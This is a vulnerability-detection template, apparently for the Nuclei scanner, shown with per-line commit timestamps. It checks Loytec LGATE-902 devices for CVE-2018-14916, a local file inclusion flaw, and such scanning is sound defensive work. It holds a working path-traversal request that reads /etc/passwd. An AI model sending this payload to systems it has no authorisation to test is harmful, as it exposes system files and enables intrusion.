2021-11-16 09:11:29 +00:00
|
|
|
id: CVE-2018-14916
|
2022-04-22 10:38:41 +00:00
|
|
|
|
2021-11-16 09:11:29 +00:00
|
|
|
info:
|
2022-05-13 20:26:43 +00:00
|
|
|
name: Loytec LGATE-902 <6.4.2 - Local File Inclusion
|
2021-11-16 09:11:29 +00:00
|
|
|
author: 0x_Akoko
|
|
|
|
severity: critical
|
2022-05-13 20:26:43 +00:00
|
|
|
description: Loytec LGATE-902 versions prior to 6.4.2 suffers from a local file inclusion vulnerability.
|
2021-11-16 09:11:29 +00:00
|
|
|
reference:
|
|
|
|
- https://packetstormsecurity.com/files/152453/Loytec-LGATE-902-XSS-Traversal-File-Deletion.html
|
2021-11-16 09:37:38 +00:00
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2018-14916
|
2022-05-17 09:18:12 +00:00
|
|
|
- http://packetstormsecurity.com/files/152453/Loytec-LGATE-902-XSS-Traversal-File-Deletion.html
|
|
|
|
- https://seclists.org/fulldisclosure/2019/Apr/12
|
2021-11-16 09:11:29 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H
|
2022-05-17 09:18:12 +00:00
|
|
|
cvss-score: 9.1
|
2021-11-16 09:11:29 +00:00
|
|
|
cve-id: CVE-2018-14916
|
|
|
|
cwe-id: CWE-732
|
2022-08-27 04:41:18 +00:00
|
|
|
tags: cve2018,loytec,lfi,packetstorm,seclists,cve
|
2023-04-28 08:11:21 +00:00
|
|
|
metadata:
|
|
|
|
max-request: 1
|
2021-11-16 09:11:29 +00:00
|
|
|
|
2023-04-27 04:28:59 +00:00
|
|
|
http:
|
2021-11-16 09:11:29 +00:00
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- "{{BaseURL}}/webui/file_guest?path=/var/www/documentation/../../../../../etc/passwd&flags=1152"
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
|
|
|
|
- type: regex
|
|
|
|
regex:
|
|
|
|
- "root:[x*]:0:0"
|
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|